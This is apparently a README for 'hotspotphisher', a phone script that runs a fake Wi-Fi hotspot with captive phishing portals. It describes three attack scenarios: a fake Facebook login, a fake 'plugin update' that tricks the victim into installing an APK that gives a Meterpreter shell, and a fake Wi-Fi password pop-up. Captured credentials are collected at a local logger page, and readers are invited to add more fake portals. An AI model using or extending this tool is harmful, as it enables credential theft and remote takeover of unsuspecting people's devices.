hotspotphisher
hotspotphisher copied to clipboard
Turn Your Smart Phone into a Phishing Tool
I made this basic script and tested it on Kali Nethunter (rooted).
You don't need a second wireless interface or monitor mode. wlan0 is enough.
Note 1:
You need 3G/LTE connection button enabled, but you don't need to be connected to the internet. Even if your data plan is 0 megabytes, the attack works when you activate the mobile data 3G/LTE .
Note 2:
Sometimes you have to try again if the target doesn't change, restart the script, kill php process manually, turn the hotspot on/off or remove the directory from "/var/www/html/".
1. Scenario 1: facebook phishing
data:image/s3,"s3://crabby-images/1c80e/1c80ebb533849db9aa0caf4f6fc7497e9796aa3f" alt=""
2. Scenario 2: fake plugin update with android APK
data:image/s3,"s3://crabby-images/8b473/8b473068784c77aa7853d454acdaab3ceb153710" alt=""
When the victim connects to the fake hotspot, he will get a splash screen asking him to download a necessary plugin update (update.apk)
If he installs the apk, you'll get a meterpreter shell.
3. Scenario 3: Wifi Password Pop up
data:image/s3,"s3://crabby-images/f7c06/f7c06a8a7ab873b30651e61a0cd0939de45663eb" alt=""
You can access the logged credentials in the browser.
http://127.0.0.1:8080/logger.html
Feel free to improve the script by modifying the code or providing other fake portals